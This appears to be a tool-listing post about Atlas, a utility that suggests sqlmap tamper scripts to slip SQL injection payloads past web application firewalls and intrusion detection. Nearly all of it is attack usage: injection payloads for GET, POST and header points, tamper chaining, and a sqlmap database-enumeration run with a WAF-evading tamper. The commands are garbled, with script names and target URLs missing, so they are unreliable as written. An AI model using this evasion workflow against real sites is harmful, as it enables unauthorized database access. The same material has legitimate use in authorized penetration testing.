Atlas : Quick SQLMap Tamper Suggester v1.0

Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.



$ git clone atlas
$ cd atlas
$ python # python3+


$ python –url –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

injection point (with %%inject%%):

  • Get:

$ python –url –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

  • Post:

$ python –url -m POST -D ‘test=%%10%%’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

  • Headers:

$ python –url -H ‘User-Agent: mozilla/5.0%%inject%%’ -H ‘X-header: test’ –payload=”-1234 AND 4321=4321– AAAA” –random-agent -v

  • Tampers Concatenation:

$ python –url –payload=”-1234 AND 4321=4321– AAAA” –concat “equaltolike,htmlencode” –random-agent -v

  • Get Tampers List:

$ python -g

Also Read – Vault : Tool For Secrets Management, Encryption As A Service & Privileged Access Management


  • Run SQLMap:

$ python -u ‘’ –dbs –random-agent -v 3

Price_ASC’) AND 8716=4837 AND (‘yajr’=’yajr is blocked by WAF/IDS/IPS, now trying with Atlas:

$ python –url ‘’ –payload=”‘) AND 8716=4837 AND (‘yajr’=’yajr” –random-agent -v

At this point:

$ python -u ‘’ –dbs –random-agent -v 3 –tamper=versioned